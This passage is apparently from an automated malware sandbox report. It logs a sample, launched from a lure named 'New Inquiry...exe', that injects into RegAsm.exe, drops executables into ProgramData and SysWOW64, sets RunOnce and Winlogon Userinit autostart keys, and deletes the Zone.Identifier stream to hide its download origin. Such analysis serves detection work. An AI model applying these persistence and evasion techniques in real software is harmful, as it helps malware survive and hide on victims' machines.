            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1DB256F5 push edx; iretd 13_2_1DB256F6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1DB22E29 push ds; iretd 13_2_1DB23206
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1DB23662 push ecx; ret 13_2_1DB2366D
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE39A1 push ebp; retf 13_2_1FEE39A2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3D9B push esi; retf 13_2_1FEE3DA2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3D98 push esi; retf 13_2_1FEE3D9A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3921 push esp; retf 13_2_1FEE3922
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3EEB push edi; retf 13_2_1FEE3EF2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3EE8 push edi; retf 13_2_1FEE3EEA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE0AD8 push F01DCB26h; retf 13_2_1FEE0ADD
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3843 push esp; retf 13_2_1FEE384A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE3841 push esp; retf 13_2_1FEE3842
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 13_2_1FEE0006 push ss; retf 13_2_1FEE002E
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeCode function: 18_2_021C0A3F push cs; retf 18_2_021C0A91
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 21_2_0241000C pushfd ; retf 21_2_02410053
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\ProgramData\782401\anibtcent.exe.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Windows\SysWOW64\clientsvr.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Users\user\Hustankesgy3\demisphereklediskene.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\ProgramData\782401\anibtcent.exe.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile created: C:\Windows\SysWOW64\clientsvr.exeJump to dropped file

            Boot Survival:

            barindex
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior
            Creates an undocumented autostart registry key Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon UserinitJump to behavior
            Creates multiple autostart registry keysShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnessesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnessesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnessesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnessesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce monotonousnessesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HWKPJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\New Inquiry 903838737777721102029393003938.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\ProgramData\782401\anibtcent.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Hustankesgy3\demisphereklediskene.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
